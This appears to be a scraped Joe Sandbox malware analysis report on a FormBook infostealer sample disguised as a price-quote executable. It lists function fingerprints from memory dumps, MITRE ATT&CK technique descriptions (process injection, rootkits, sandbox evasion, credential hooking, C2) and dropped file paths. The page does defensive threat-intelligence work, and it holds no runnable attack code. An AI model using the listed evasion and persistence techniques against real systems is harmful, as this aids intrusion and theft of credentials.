Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: da60d7541a5bba4d1124e02a8ed12221ab1b170d56e4945b407a76e38aff7653
Instruction ID: e0c061b9c59364f81e1761062f481a85f2db90fa4d2f335069f5ac6c626bbd06
Opcode Fuzzy Hash: da60d7541a5bba4d1124e02a8ed12221ab1b170d56e4945b407a76e38aff7653
Instruction Fuzzy Hash: 4B51A4B5A00156BBDF20DFAD899097EF7F8BB48204714C979E4A5D7641E234FE508BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04A02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A024A6
___swprintf_l.LIBCMT ref: 04A024E2
___swprintf_l.LIBCMT ref: 04A0257D
___swprintf_l.LIBCMT ref: 04A025A3
___swprintf_l.LIBCMT ref: 04A025C8
___swprintf_l.LIBCMT ref: 04A02608

Strings

ffff:, xrefs: 04A0247D, 04A0249D
::ffff:0:%u.%u.%u.%u, xrefs: 04A024DA
::%hs%u.%u.%u.%u, xrefs: 04A0249E
:%u.%u.%u.%u, xrefs: 04A025FF

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c1dd14fe141b8860816554b620798a1655b08be223ad9bfb93dd2d171e075319
Instruction ID: f38b1e3fe96d1d6464d6a9642e672b9396c480c331ff3940dd6030bffe0db8db
Opcode Fuzzy Hash: c1dd14fe141b8860816554b620798a1655b08be223ad9bfb93dd2d171e075319
Instruction Fuzzy Hash: F251D572A00745ABDB30DF5CD894A7EB7F8EB88304B04C4AAE496D7681E674FE408760

Uniqueness

Uniqueness Score: -1.00%

Function 04987630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049C46FC
Execute=1, xrefs: 049C4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 049C4655
ExecuteOptions, xrefs: 049C46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 049C4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 049C4742
CLIENT(ntdll): Processing section info %ws..., xrefs: 049C4787

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: bbf7ef7adf16f9e27e7b39ab9c3b5ffdee798beba6bff287c6c04a59c5870780
Instruction ID: 97d48e2f9c7b4ddefc456b0fd0dfdfd8cba357cbe41d0c92deb58f9705ffb488
Opcode Fuzzy Hash: bbf7ef7adf16f9e27e7b39ab9c3b5ffdee798beba6bff287c6c04a59c5870780
Instruction Fuzzy Hash: 2C5104356402097AEF10BFA89C96BAA73A8EF89304F2404FDE505A7190EB71BE41CE51

Uniqueness

Uniqueness Score: -1.00%

Function 04A26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: eabbb13998d521ae5d3596cc847fd2dc94f4a7a347d153dd0110f5734a3f2924
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 0C021271509351AFD705DF1CCA90A6EBBE5EFC8704F048A2DF9898B264DB31E905DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0499B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0499B6BF

Strings

0, xrefs: 0499B695
+, xrefs: 0499B65A
-, xrefs: 0499B650
0, xrefs: 0499B66F

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 9bf5cbe2e1ce806b9900c4a887a30a7792323c0d2d857a3d5af624e9d01141aa
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 3781A270E052499EEF248E6CE8917FEBBE6BF85320F184639D851A7690D738BC40C751

Uniqueness

Uniqueness Score: -1.00%

Function 04A020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A0214F
___swprintf_l.LIBCMT ref: 04A02172

Strings

%%%u, xrefs: 04A02146
]:%u, xrefs: 04A02169
[, xrefs: 04A0212B

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: a18d393c04c6bc06e3302b71458e8256c945f67f8d670fd0b435fd9f8994eded
Instruction ID: 73ef86eaca3543fd60d23a0fbc7e4a91fe3c5579bec4fc8dabbe93a1039b0d06
Opcode Fuzzy Hash: a18d393c04c6bc06e3302b71458e8256c945f67f8d670fd0b435fd9f8994eded
Instruction Fuzzy Hash: F4214F76A11219ABDB10DFB9D844AEEBBF8AF94744F044166E905E3240E730BD018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0497F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049C02BD
RTL: Re-Waiting, xrefs: 049C031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049C02E7

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 55459645a04c4734bed2c5b13842248c0708eee946f5be019941067de956fa5c
Instruction ID: 12089ab00c362a65c58783061d9bbd21ef29e75255b82c2a93fc1603686e6b99
Opcode Fuzzy Hash: 55459645a04c4734bed2c5b13842248c0708eee946f5be019941067de956fa5c
Instruction Fuzzy Hash: F2E1BC30608741DFDB24CF68C884B2AB7E5BB88324F140A7DE5A59B2E1E774F945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0498BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 049C7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 049C7B7F
RTL: Resource at %p, xrefs: 049C7B8E

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 9390f1b1d612936b5dd40d98588373d07e4aab921a3b455640b5c634da3c79f8
Instruction ID: 14a8866bff8ad53bc09592277079ebd8796aa66aa17234f9fe777d6266f20131
Opcode Fuzzy Hash: 9390f1b1d612936b5dd40d98588373d07e4aab921a3b455640b5c634da3c79f8
Instruction Fuzzy Hash: 1E41EF357417029FD720EE29C841B6AB7E9EF89724F040A3DF95A9B281DB30F8058F91

Uniqueness

Uniqueness Score: -1.00%

Function 0498B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049C728C

Strings

RTL: Re-Waiting, xrefs: 049C72C1
RTL: Resource at %p, xrefs: 049C72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 049C7294

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 77a0fbdaf424830dbd9b063d2f6610415ccdea478476d807be88de1b7b7cf445
Instruction ID: 6b665ec0d914b8d0f3830ab582a0fe7b8e0aca8260b4a16ea81461d83043c596
Opcode Fuzzy Hash: 77a0fbdaf424830dbd9b063d2f6610415ccdea478476d807be88de1b7b7cf445
Instruction Fuzzy Hash: 9841D231740606ABE720DE69CC42F66B7A9FB84714F140A7DF955AB240DB31F852CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04A02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A0238D
___swprintf_l.LIBCMT ref: 04A023B3

Strings

]:%u, xrefs: 04A023AA
%%%u, xrefs: 04A02384

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 61385f08dd237e680a198bc733e9ba1cfbe034de5626516afa81279bf5c8d536
Instruction ID: d5676c39636fe38319d69a597a20e8f098941902540a7dc579f38563b917c94a
Opcode Fuzzy Hash: 61385f08dd237e680a198bc733e9ba1cfbe034de5626516afa81279bf5c8d536
Instruction Fuzzy Hash: B3315776A002199FDB20DF29DC54BEEB7F8EB44714F4445A5E849D3240EB30BE558FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04997D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04997E8B

Strings

-, xrefs: 04997DDD
+, xrefs: 04997DE8

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 97df42f11d3e0657375ad83e7f4f7df395dc24a84be2affac3f3edb3c6916603
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A791A770E60206DBDF24DEDDC8856BEB7E9AF45720F14457AE855A72D0EF30AD408720

Uniqueness

Uniqueness Score: -1.00%

Function 04959126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04959191
@, xrefs: 04959175

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1ada47107087243e31f08e9e0ef3a8077cd72e912d2ff6c6ad073ccc75abe914
Instruction ID: 3cb886a475fcb577f1b98a4f1745127ffe8c9cada7361850ff0172e6f14e7803
Opcode Fuzzy Hash: 1ada47107087243e31f08e9e0ef3a8077cd72e912d2ff6c6ad073ccc75abe914
Instruction Fuzzy Hash: B5812AB1D00269DBDB31DF54CD44BEEB7B8AB48754F1041EAA919B7250E770AE81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 049DCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 049DCFBD

Strings

@, xrefs: 049DCF0A
@4_w@4_w, xrefs: 049DCFD5, 049DCFDA, 049DCFF1

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: 8303b2f7a1a1bf23c3edafceff41fc11b9d7b804cd3455beca18171e3ddfea86
Instruction ID: a531f857a7a6116dd60dcddb2009cc0a7a07edb416a259abc7be77d3caf9360f
Opcode Fuzzy Hash: 8303b2f7a1a1bf23c3edafceff41fc11b9d7b804cd3455beca18171e3ddfea86
Instruction Fuzzy Hash: E2419071A40218EFDB21DFA9D840AADBBB8FFD5B14F10853AE906DB254D734E801CB61

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ySqETqNvdTbE.exe.log

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yqlf5wu.psl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5v4qnhsb.fmo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2nmyyj5.4if.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz23ptbr.y32.psm1

C:\Users\user\AppData\Local\Temp\tmp17EA.tmp

C:\Users\user\AppData\Local\Temp\tmpF7.tmp

C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe:Zone.Identifier

Static File Info

General

Windows Analysis Report
